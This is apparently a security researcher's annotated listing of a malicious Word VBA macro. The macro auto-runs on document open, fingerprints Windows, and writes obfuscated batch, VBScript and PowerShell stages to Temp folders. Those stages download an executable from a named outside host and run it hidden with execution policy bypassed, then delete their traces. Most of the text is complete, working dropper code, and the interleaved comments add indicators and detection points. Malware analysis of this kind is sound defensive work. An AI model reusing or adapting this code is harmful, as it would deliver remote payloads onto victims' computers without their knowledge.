dynamoo

Malicious Word macro

Dec 17th, 2014
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Sub Auto_Open()
      ' Auto-run entry point. It does nothing itself except call h, which holds
      ' the dropper logic. AutoOpen and Workbook_Open further down forward here,
      ' so any of the three auto-exec names triggers the same code.
  10.     h
  11. End Sub
  12. Sub h()
      ' Analyst summary (derived from the statements below):
      '   * builds obfuscated file names/paths with Chr()/Asc() string splitting,
      '   * deletes leftovers of a previous run,
      '   * reads the Windows version through WMI,
      '   * writes helper scripts (.bat/.vbs, plus .ps1 on newer Windows) to a Temp
      '     directory; these fetch an executable over HTTP and run it,
      '   * launches the batch file hidden via Shell(..., 0),
      '   * finally edits the open document (marker tags removed, text recoloured).
      ' Variables holding random-looking strings (ASDSA, ASJDKHSJADASDSA) are never
      ' read in this listing; they look like filler added to vary the code.
  13. Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR
  14.      USER = Environ("username")
  15.      
      ' Decoded artifact names (useful as file-name indicators):
      '   PST1  = adobeacd-update.ps1     BART  = adobeacd-update.bat
      '   VBT1  = adobeacd-update.vbs     VBTXP = adobeacd-updatexp.vbs
  16.      PST1 = "adobeacd-update." + "p" + Chr(115) + "1"
  17.      BART = "adobeacd-update" + "." + "b" + Chr(Asc(Chr(Asc("a")))) + Chr(Asc("t"))
  18.      ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
  19.      VBT1 = "adobeacd-update." + Chr(118) + "b" + "s"
  20.      VBTXP = "adobeacd-updatexp" + "." + "v" + Chr(Asc("b")) + "s"
  21.      
  22.      
      ' Drop locations. The user-profile paths are hard-coded as
      ' c:\Users\<username>\AppData\Local\Temp\ rather than taken from %TEMP%:
      '   MY_FILENDIR -> ...\Temp\adobeacd-update.ps1
      '   MY_FILEDIR  -> ...\Temp\adobeacd-update.bat
      '   MY_FILDIR   -> ...\Temp\adobeacd-update.vbs
      '   XPFILEDIR   -> c:\Windows\Temp\adobeacd-updatexp.vbs
      '   TRT / KRT   -> c:\Windows\Temp\adobeacd-update.bat
  23.      MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
  24.      ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
  25.      MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
  26.      MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
  27.      XPFILEDIR = "c:\Windows\Temp\" + VBTXP
  28.      TRT = "c:\Windows\Temp\" + BART
  29.      KRT = TRT
  30.      
      ' Cleanup of earlier artifacts: clear file attributes, then delete the file
      ' if Dir() finds it. On Error Resume Next stays in effect for the rest of
      ' the procedure, so every later failure (missing path, access denied, WMI
      ' error) is silently ignored and nothing is shown to the user.
  31.       On Error Resume Next
  32.      SetAttr MY_FILENDIR, vbNormal
  33.      
  34.      If (Len(Dir(MY_FILENDIR)) <> 0) Then
  35.       Kill MY_FILENDIR
  36.      End If
  37.      
  38.      On Error Resume Next
  39.      SetAttr MY_FILEDIR, vbNormal
  40.      If (Dir(MY_FILEDIR) <> "") Then
  41.       Kill MY_FILEDIR
  42.      End If
  43.      
  44.      On Error Resume Next
  45.      SetAttr MY_FILDIR, vbNormal
  46.      If (Dir(MY_FILDIR) <> "") Then
  47.       Kill MY_FILDIR
  48.      End If
  49.      
  50.      On Error Resume Next
  51.      SetAttr XPFILEDIR, vbNormal
  52.      If (Dir(XPFILEDIR) <> "") Then
  53.       Kill XPFILEDIR
  54.      End If
  55.      
      ' File handles for the scripts written below. FreeFile is called five times
      ' with no Open in between, so the handles most likely all receive the same
      ' number; the files are opened and closed one at a time.
  56.      Dim FileNumber As Integer
  57.      Dim FileNumb As Integer
  58.      Dim FileNu As Integer
  59.      Dim FileNuG As Integer
  60.      Dim FileNukk As Integer
  61.      Dim mttt As Integer
  62.      Dim retVal As Variant
  63.      'Dim winver As Integer
  64.     FileNumber = FreeFile
  65.      FileNumb = FreeFile
  66.      FileNu = FreeFile
  67.      FileNukk = FreeFile
  68.      FileNuG = FreeFile
      ' OS fingerprinting through WMI (Win32_OperatingSystem). The first loop
      ' builds SysReport, which is not used anywhere else in this listing; the
      ' second loop keeps the version string that selects the branch below.
  69.      Dim objWMIService As Variant
  70.     Dim colOperatingSystems As Variant
  71.     Dim objOperatingSystem As Variant
  72.     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  73.     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  74.     For Each objOperatingSystem In colOperatingSystems
  75.         SysReport = SysReport & "The operating system on this computer is " & _
  76.             objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
  77.     Next
  78.      
  79.      Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  80.      Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  81.      For Each objOperatingSystem In colOperatingSystems
  82.         winverstr = objOperatingSystem.Version
  83.     Next
  84.    
  85.    
      ' Val() keeps only the leading "major.minor" number of the version string.
  86.     winver = Val(winverstr)
  87.     WaitFor (1)
  88.      
      ' Branch 1: version <= 5.5 (the Windows 5.x family, i.e. XP-era systems).
      ' Everything is written to c:\Windows\Temp\.
      ' The batch file (KRT) runs the VBS below with cscript.exe, then starts
      ' c:\Windows\Temp\444.exe, then loops deleting the .vbs and itself.
      ' "ping 1.1.2.2 -n N" is used as a delay between steps.
  89.  If (winver <= 5.5) Then
  90.      Open KRT For Output As #FileNuG
  91.      Print #FileNuG, "@echo off"
  92.      Print #FileNuG, "ping 1.1.2.2 -n 2"
  93.      Print #FileNuG, ":ksadatk"
  94.      Print #FileNuG, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34)
  95.      Print #FileNuG, "ping 1.1.2.2 -n 2"
  96.      Print #FileNuG, "c:\Windows\Temp\444.exe"
  97.      Print #FileNuG, ":loop"
  98.      Print #FileNuG, "ping 1.1.2.2 -n 1"
  99.      Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
  100.      Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
  101.      Print #FileNuG, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop"
  102.      Print #FileNuG, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop"
  103.      Print #FileNuG, "exit"
  104.      Close #FileNuG
  105.      
  106.      WaitFor (2)
      ' mttt = 88 is the base for the Chr(mttt - n) arithmetic below, which
      ' spells the ProgID "MSXML2.XMLHTTP" without the literal appearing in code.
  107.      mttt = 88
  108.  
      ' VBS downloader (XPFILEDIR): HTTP GET of
      ' hxxp://www.lynxtech[.]com[.]hk/images/tn.exe (defanged here), saved through
      ' ADODB.Stream as c:\Windows\Temp\444.exe when the status is 200.
      ' The generated script creates a WScript.Shell object on its last line but
      ' does not use it; execution of 444.exe is done by the batch file above.
  109.      Open XPFILEDIR For Output As #FileNumber
  110.      Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://www.lynxtech.com.hk/images/tn" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  111.      Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  112.      
  113.      Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2" + "." + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + Chr(mttt - 54) + ")"
  114.      'Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
  115.    
  116.      Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
  117.      
  118.      Print #FileNumber, "objXMLHTTP.send() "
  119.      Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
  120.      
  121.      Print #FileNumber, "Set objADOStream = C" + "reateO" + "bject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "
  122.      
  123.      Print #FileNumber, "objADOStream.Open "
  124.      Print #FileNumber, "objADOStream.Type = 1"
  125.      Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody "
  126.      Print #FileNumber, "objADOStream.Position = 0 "
  127.      Print #FileNumber, "objADOStream.SaveToFile strTecation "
  128.      Print #FileNumber, "objADOStream.Close "
  129.      Print #FileNumber, "Set objADOStream = Nothing "
  130.      Print #FileNumber, "End if "
  131.      Print #FileNumber, "Set objXMLHTTP = Nothing"
  132.      Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")"
  133.      Close #FileNumber
  134.      
  135.      WaitFor (1)
  136.      
      ' Start the batch file with window style 0 (hidden). From a detection
      ' viewpoint this is an Office process spawning a .bat from c:\Windows\Temp,
      ' followed by cscript.exe.
  137.      ASKJD = TRT
  138.      retVal = Shell(ASKJD, 0)
  139.      
  140. End If
  141.  
  142.  
      ' Branch 2: version > 5.5 (Vista and later). Files go to the user's
      ' AppData\Local\Temp. Chain: .bat -> cscript .vbs -> powershell .ps1.
      ' The PowerShell script (MY_FILENDIR):
      '   * downloads the same URL as branch 1 with System.Net.WebClient to
      '     ...\Temp\444.exe, sending a fixed Safari-on-Mac User-Agent header,
      '   * sleeps 15 seconds and runs 444.exe through cmd.exe /c,
      '   * flips the Hidden attribute (-bxor) on the .vbs/.bat/.ps1 files,
      '   * removes the .vbs, .bat, 444.exe and finally itself.
  143. If (winver > 5.5) Then
  144.      Open MY_FILENDIR For Output As #FileNumber
  145.      Print #FileNumber, "$down = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
  146.      Print #FileNumber, "$url  = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://www.lynxtech.com.hk/images/tn" & ".e" & "x" + "e';"
  147.      Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
  148.      Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';"
  149.      Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
  150.      Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
  151.      Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
  152.      Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';"
  153.      Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';"
  154.      Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';"
  155.      Print #FileNumber, "Start-Sleep -s 15;"
  156.      Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c  'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e';     "
  157.      Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
  158.      Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
  159.      Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
  160.      Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
  161.      Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
  162.      Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
  163.      Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
  164.      Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
  165.      Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
  166.      Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
  167.      Close #FileNumber
  168.    
      ' VBS launcher (MY_FILDIR). The last generated line decodes to
      '   objShell.Run "powerShell.exe -noexit -ExecutionPolicy bypass -noprofile -file " & currentFile,0,true
      ' i.e. the .ps1 above is run in a hidden window with the execution policy
      ' bypassed. That command line is a strong host-side detection point.
  169.     Open MY_FILDIR For Output As #FileNumb
  170.     Print #FileNumb, "Dim dff"
  171.     Print #FileNumb, "dff = 68"
  172.     Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
  173.     Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
  174.     Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34)
  175.     Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
  176.     Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
  177.     Close #FileNumb
  178.    
      ' Batch stage (MY_FILEDIR): delay via ping, "chcp 1251" (the Windows
      ' Cyrillic code page), then cscript.exe on the .vbs written above.
  179.     Open MY_FILEDIR For Output As #FileNukk
  180.     Print #FileNukk, "@echo off"
  181.     Print #FileNukk, "ping 1.1.2.2 -n 2"
  182.     Print #FileNukk, "chcp 1251"
  183.     Print #FileNukk, ":csakclasjdklas"
  184.     Print #FileNukk, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34)
  185.     Print #FileNukk, "exit"
  186.     Close #FileNukk
  187.        
  188.     SetAttr MY_FILENDIR, vbNormal
  189.     SetAttr MY_FILEDIR, vbNormal
  190.     SetAttr MY_FILDIR, vbNormal
  191.      
  192.     WaitFor (1)
      ' Start the batch file with window style 0 (hidden): an Office process
      ' spawning a .bat from the user's Temp directory.
  193.     SJAKLD = MY_FILEDIR
  194.     retVal = Shell(SJAKLD, 0)
  195. End If
  196.  
  197.      
      ' Document manipulation after the drop: findTest and secondTest act on the
      ' text between <select>...</select> and <inbox>...</inbox> markers, then the
      ' four loops below replace the marker tags themselves with a space in every
      ' story range. The tag strings are split so they do not appear literally.
  198.      findTest
  199.     secondTest
  200.     For Each myStoryRange In ActiveDocument.StoryRanges
  201.     With myStoryRange.Find
  202.         .Text = "<" & "sel" & "ect>"
  203.         .Replacement.Text = " "
  204.         .Wrap = wdFindContinue
  205.         .Execute Replace:=wdReplaceAll
  206.     End With
  207.     Next myStoryRange
  208.  
  209.     For Each myStoryRange In ActiveDocument.StoryRanges
  210.     With myStoryRange.Find
  211.         .Text = "</s" & "ele" & "ct>"
  212.         .Replacement.Text = " "
  213.         .Wrap = wdFindContinue
  214.         .Execute Replace:=wdReplaceAll
  215.     End With
  216.     Next myStoryRange
  217.    
  218.     For Each myStoryRange In ActiveDocument.StoryRanges
  219.     With myStoryRange.Find
  220.         .Text = "<" & "in" & "box>"
  221.         .Replacement.Text = " "
  222.         .Wrap = wdFindContinue
  223.         .Execute Replace:=wdReplaceAll
  224.     End With
  225.     Next myStoryRange
  226.  
  227.     For Each myStoryRange In ActiveDocument.StoryRanges
  228.     With myStoryRange.Find
  229.         .Text = "</" & "in" & "box>"
  230.         .Replacement.Text = " "
  231.         .Wrap = wdFindContinue
  232.         .Execute Replace:=wdReplaceAll
  233.     End With
  234.     Next myStoryRange
  235.      
  236.  
  237. End Sub
  238. Sub WaitFor(NumOfSeconds As Long)
      ' Delay helper: spins until Timer reaches the start value plus
      ' NumOfSeconds, calling DoEvents on each pass so the host application
      ' keeps processing events. SngSec is declared Long, so the fractional
      ' part of Timer is lost when the deadline is stored.
  239. Dim SngSec As Long
  240. SngSec = Timer + NumOfSeconds
  241.  
  242. Do While Timer < SngSec
  243. DoEvents
  244. Loop
  245.  
  246. End Sub
  247.  
  248. Sub AutoOpen()
      ' Word's auto-exec macro name; forwards to Auto_Open so the dropper runs
      ' when the document is opened with macros enabled.
  249.     Auto_Open
  250. End Sub
  251. Sub Workbook_Open()
      ' Excel's workbook-open event name; also forwards to Auto_Open. Its
      ' presence in a Word ThisDocument module suggests the same macro body is
      ' reused across Office file types (inferred, not shown on this page).
  252.     Auto_Open
  253. End Sub
  254. Sub findTest()
      ' Deletes the document text located between the first "<select>" marker
      ' and the following "</select>" marker. The range starts at the end of the
      ' opening tag and stops at the start of the closing tag, so the tags
      ' themselves remain in place after this call.
      ' Presumably this removes lure text once macros have run - confirm against
      ' the original document body, which is not part of this listing.
      ' The ASK... string assignments are never read; they look like filler.
  255. Dim firstTerm As String
  256. Dim secondTerm As String
  257. Dim rrtt As Range
  258. Dim selRange As Range
  259. Dim selectedText As String
  260.  
  261. Set rrtt = ActiveDocument.Range
  262. firstTerm = "<se" & "lect>"
  263. secondTerm = "</sel" & "ect>"
  264. ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
  265. With rrtt.Find
  266. .Text = firstTerm
  267. .MatchWholeWord = True
  268. .Execute
  269. ASKUKKIEJ = "aasdlkasjdask as8d j dnkjh12kh1 sad"
      ' rrtt now sits just after the opening tag; selRange starts there.
  270. rrtt.Collapse direction:=wdCollapseEnd
  271. Set selRange = ActiveDocument.Range
  272. selRange.Start = rrtt.End
  273. .Text = secondTerm
  274. .MatchWholeWord = True
  275. .Execute
  276. ASKSASADW = "asjldklas"
      ' rrtt now sits just before the closing tag; selRange ends there.
  277. rrtt.Collapse direction:=wdCollapseStart
  278. selRange.End = rrtt.Start
  279. selectedText = selRange.Delete
  280. End With
  281. End Sub
  282.  
  283. Sub secondTest()
      ' Uses the same search pattern as findTest, but with "<inbox>" and
      ' "</inbox>" markers. The text between them is kept and its font colour is
      ' set to black.
      ' Presumably this reveals content that was not visible before the macro
      ' ran (e.g. text in the background colour) - confirm against the original
      ' document. myRanget is declared but never used; the ASK... string
      ' assignments are never read.
  284. Dim firstTerm As String
  285. Dim secondTerm As String
  286. Dim myRanget As Range
  287. Dim yytt As Range
  288. Dim selRanget As Range
  289. Dim selectedTextt As String
  290.  
  291. Set yytt = ActiveDocument.Range
  292. firstTerm = "<in" & "box>"
  293. secondTerm = "</in" & "box>"
  294. ASKIEJSASAHBDJ = "ask as8d j asdasl;a skdjasdnkjh12kh1 sad"
  295. With yytt.Find
  296. .Text = firstTerm
  297. .MatchWholeWord = True
  298. .Execute
  299. ASKIEJ = "ask as8d j dnkjh12kh1 sad"
  300. yytt.Collapse direction:=wdCollapseEnd
  301. ASKIEJSHBDJ = "askasda as8d j asdaasdassl;a skdjasdnkjh12kh1 sad"
  302. Set selRanget = ActiveDocument.Range
  303. selRanget.Start = yytt.End
  304. .Text = secondTerm
  305. .MatchWholeWord = True
  306. .Execute
  307. ASAKJSKIEJSHBDJ = "ask as8d j asdaasdasdassl;a skdjasdnkjh12kh1 sad"
  308. yytt.Collapse direction:=wdCollapseStart
  309. selRanget.End = yytt.Start
      ' The range is assigned to a String; the value is not used afterwards.
  310. selectedTextt = selRanget
  311. selRanget.Font.Color = wdColorBlack
  312. End With
  313. End Sub